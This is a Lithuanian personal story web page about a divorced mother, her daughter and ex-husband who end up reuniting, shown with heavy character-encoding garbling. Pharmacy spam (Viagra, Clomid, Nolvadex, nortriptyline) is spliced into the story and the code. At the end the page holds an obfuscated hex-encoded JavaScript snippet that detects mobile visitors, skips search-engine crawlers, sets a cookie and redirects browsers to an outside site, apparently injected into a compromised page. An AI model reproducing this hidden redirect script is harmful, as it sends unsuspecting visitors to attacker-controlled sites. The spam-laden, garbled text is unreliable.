Pagaliau vAi??l normali A?eima

2013 02 8  |  Istorijos


DA?iaugiausi, kad apsigyvenAi?? atskirai bendravome ir rAi??pinomAi??s vaiku. Bet dukra prasitardavo, kad norAi??tA?, jog vAi??l bAi??tume kartu.

A?velgiau, kaip dukra A?eina A? jau svetimo namo laiptinAi??, ir uA?plAi??do liAi??dnos mintys. VAi??l savaitgalis ir aA? vAi??l liksiu be savo mylimiausio A?moguA?io. Po skyrybA?, kurios A?vyko prieA? dvejus metus, AustAi??ja savaitgalius leidA?ia su tAi??A?iu. A?inoma, mAi??sA? gyvenimas daug geresnis nei A?eimA?, kurios dAi??l vaikA? prieA?iAi??ros bylinAi??jasi teismuose ar, atvirkA?A?iai, tAi??A?iai dingsta kaip A? vandenA?, metus nesidomi, kaip sekasi vaikams. Bet ir man nesaldu.
KiekvienAi?? A?eA?tadienio rytAi?? nulydA?iu AustAi??jAi?? iki ArAi??no namA?, o sekmadienio vakarAi?? jis dukrAi?? parveda atgal. Ji grA?A?ta linksma. ai??zNet per daug linksmaai???, ai??i?? vis lenda A? galvAi?? mintis, nors garsiai to nepasakau. AustAi??ja visuomet buvo gyvybingas, smagus vaikas, taA?iau tokia besiA?ypsanti ir trykA?tanti A?spAi??dA?iais ji bAi??na tik sekmadienio vakarais. AiA?ku, dAi??l ko: ArAi??nas dukrai leidA?ia viskAi??, ko ji uA?simano. Nesunku bAi??ti tAi??A?iu tik per iA?eigines! O man tenka visi auklAi??jimo vargai. NeiA?vengiamai tenka jAi?? ir subarti. PrieA?ingai nei buvAi??s vyras, turiu skaiA?iuoti kiekvienAi?? centAi??.
Ir tAi?? savaitgalA? dukra, A? namus A?puolusi kaip viesulas, pareiA?kAi??:
ai??i?? Ai??sivaizduoji, mes su juo buvome Kaune, zoologijos sode! Labai noriu ten dar kartAi??. Kaip gerai bAi??tA?, jeigu nuvaA?iuoA?iau su tavim…
NesiAi??miau aiA?kinti, kad mums tektA? kurA? laikAi?? pataupyti ir atsisakyti kasdien vieno kito geresnio kAi??snio. Juo labiau neuA?siminiau apie tai, kad tAi??tis jAi?? labai lepina. ArAi??nui seniai paA?adAi??jau, kad jo autoriteto dukters akyse nemenkinsiu ir A? mAi??sA? konfliktus jos nevelsiu.
ai??i?? DA?iaugiuosi, kad taip linksmai praleidai savaitgalA?, ai??i?? sakiau AustAi??jai, linkAi??dama jai labos nakties.
ai??i?? Buvo jAi??ga! ai??i?? pakartojo ji. ai??i?? Bet mama, gal kada nuvaA?iuojam A? zoologijos sodAi?? visi trys ai??i?? aA?, tu ir tAi??tis? Jis tikrai sutiks. viagra fast delivery, viagra fast delivery, viagra fast delivery, viagra fast delivery, viagra fast delivery viagra fast delivery viagra fast delivery, viagra fast delivery, viagra fast delivery, viagra fast delivery, viagra fast delivery, viagra fast delivery viagra fast delivery viagra fast delivery, viagra fast delivery, viagra fast delivery, viagra fast delivery, viagra fast delivery, viagra fast delivery viagra fast delivery viagra fast delivery.
ai??zTai jau tikrai, ai??i?? pamaniau. ai??i?? O aA? niekada nebesutiksiu!ai??? Su ArAi??nu dabar bendraudavom mandagiai, nekeldami balso, bet kalbAi??davom tik apie dukrAi??.
ai??i?? SaldA?iA? sapnA?, ai??i?? pabuA?iavau dukrAi?? ir tik tada susigriebiau: ai??i?? O ar kuprinAi?? susikrovei?
ai??i?? Tiek to, mama, ryte spAi??siu.
ai??i?? Ne, kelkis ir susidAi??k iA? vakaro, kad skubAi??dama ko nors nepamirA?tum.
ai??i?? O tAi??tis man niekada taip nesakytA?, ai??i?? atkirto AustAi??ja. PanaA?iA? pareiA?kimA? labai nemAi??gau.
ai??i?? TAi??tis taip nesako, nes tu iA? A?ia, iA? A?iA? namA?, eini A? mokyklAi??, ai??i?? stengiausi aiA?kinti nerodydama susierzinimo.
ai??i?? Ir tai labai blogai! Labai blogai, kad mes negyvename visi kartu, kaip kiti. Krautis kuprinAi?? yra bjauru, eiti A? mokyklAi?? yra bjauru, o skyrybos uA? viskAi?? bjauriausia!
Na, niekad nesakiau, kad tai yra puikus dalykas, bet kad jau taip nutiko… Jeigu ArAi??nas bAi??tA? daugiau laiko radAi??s mums su dukra, viskas bAi??tA? kitaip. O dabar belieka dA?iaugtis, kad atskirai gyvendami dukra dalijamAi??s be pykA?iA? ai??i?? civilizuotai. Nors ar tikrai civilizuotai? AustAi??ja mano, kad jos tAi??tis tikras idealas, o mama ai??i?? ai??zblogiukAi??ai???, liepianti uA?siimti visokiais neA?domiais dalykais. Taip neturi bAi??ti! ai??zIr daugiau taip nebusai???, ai??i?? nusprendA?iau. Ai??sitikinusi, kad dukra uA?migo, paskambinau ArAi??nui. SutarAi??me, kad kitAi?? dienAi?? susitiksim rimtai pasikalbAi??ti.
ai??i?? Kur? ai??i?? paklausiau.
ai??i?? A?inoma, mAi??sA? namuose.
ai??i?? Tai jau seniai tavo vieno namai.
ai??i?? Vis uA?mirA?tu. Tai sutarta?
Gerai apgalvojau, kAi?? sakysiu ArAi??nui. PasiAi??liau jam priA?iAi??rint dukrAi?? apsikeisti vaidmenimis. TiesAi?? sakant, giliai viduje tikAi??jausi, kad jis pasakys neturA?s laiko ir jAi??gA? kasdien rAi??pintis AustAi??ja, taigi aA? pasijusiu nepakeiA?iama. Mano didelei nuostabai, jis sutiko ai??i?? pareiA?kAi??, kad jau nuo kito pirmadienio AustAi?? tegul gyvena pas jA?. Ai??miausi aiA?kinti, koks dukros pamokA? tvarkaraA?tis, kada kokie bAi??reliai, bet iA?girdau, kad jie apie tai ne kartAi?? A?nekAi??jAi??si.
*
Taigi jau tris mAi??nesius buvau mama vien savaitgaliais. Tiesa, dukra kiekvienAi?? vakarAi?? skambindavo, kad palinkAi??A?iau jai labos nakties, bet liAi??desio ar nusivylimo jos balse nejutau. Na, o savaitgaliais eidavome pasivaikA?A?ioti, leisdavome sau pavalgyti kokioje kavinukAi??je ar kartu linksmai kepdavome pyragAi??, kartAi?? net iA?siruoA?Ai??me A? VilniA?. Juk dabar, kai didesnAi?? savaitAi??s dalA? AustAi?? leisdavo su tAi??A?iu, galAi??jau A?iek tiek sutaupyti.
ai??i?? Ar tavAi??s nepalieka vienos vakarais? ai??i?? jos klausiau nuolat.
ai??i?? Ne, tAi??tis dabar turi daugiau laiko negu tada, kai gyvenom kartu. Jis visad grA?A?ta iA? darbo penktAi?? valandAi??, po to, jeigu kas skambina, pasako, kad niekur neis, nes negali palikti manAi??s vienos. O juk galAi??tA? mane nuvesti pas moA?iutAi?? ar pas tave.
Pajutau, kaip kaA?kas sukirbAi??jo A?irdyje. ai??zEch, jeigu ArAi??nas bAi??tA? taip elgAi??sis anksA?iauai???, ai??i?? pamaniau.
Kai jau lesinome antis tvenkinyje, dukra staiga suA?uko:
ai??i?? Mama, mama, ten juk tAi??tis! ai??i?? Ir pasileido A? jo pusAi??. KAi?? gi, ten pat teko pasukti ir man.
Dukra vAi??l grA?A?o maitinti anA?iA?, o ArAi??nas manAi??s paklausAi??:
ai??i?? Na, ar esi patenkinta mAi??sA? naujuoju susitarimu?
ai??i?? DAi??l savaitgaliA? su Auste? O tu?
ai??i?? Ne, ai??i?? iA?girdau.
ai??i?? AA? irgi nelabai, ai??i?? prisipaA?inau. ai??i?? Mane erzino, kad turiu rAi??pintis jos kasdieniais reikalais, kai jAi??s vien pramogaujat, o dabar daug atiduoA?iau uA? tai, kad kartu su Auste ruoA?tume pamokas ar gamintume vakarienAi??. Kai bAi??nu darbe, viskas gerai, bet vakarais…
ai??i?? Savaitgaliais dar liAi??dniau, ai??i?? pareiA?kAi?? ArAi??nas. ai??i?? Visi vaikA?to A?eimomis, poromis, tik aA? vienas.
ai??i?? KodAi??l nesusirandi draugAi??s?
ai??i?? BandA?iau, bet nieko iA? to neiA?Ai??jo.
ai??i?? AustAi?? sako, kad visad randi jai laiko. Kas atsitiko? ai??i?? mane staiga pagavo apmaudas.Ai?? ai??i?? Juk seniau namo grA?A?davai tik miegoti!
ai??i?? Banaliai, bet teisingai pasakysiu: A?monAi??s keiA?iasi, o aA? supratau, kad yra dalykA?, svarbesniA? uA? darbAi??…
NebeA?inojau, kAi?? sakyti. Laimei, pribAi??go dukra. SutarAi??me visi kartu eiti A? kavinAi??.
ai??i?? Valio, pagaliau kaA?kur einam visi trys ir vAi??l bAi??sim normali A?eima! ai??i?? suA?uko AustAi??ja, o mudu nepuolAi??me ginA?ytis.

AuA?ra, 29 m., KaiA?iadorys

Buy Clomid Online USA no prescription. Worldwide shipping. Qualitative medication at low prices. Comfortable and safe way of buy online order Clomid, online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Clomid. Buy Nolvadex online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Nolvadex, order nolvadex. If you Buy Nolvadex it is best served for PCT. Many order Nolvadex to prevent Gyno while on cycle yet this weak prevention.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new nortriptyline for back ache and fatigue, nortriptyline for back ache and fatigue, nortriptyline for back ache and fatigue, nortriptyline for back ache and fatigue, nortriptyline for back ache and fatigue, nortriptyline for back ache and fatigue. Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite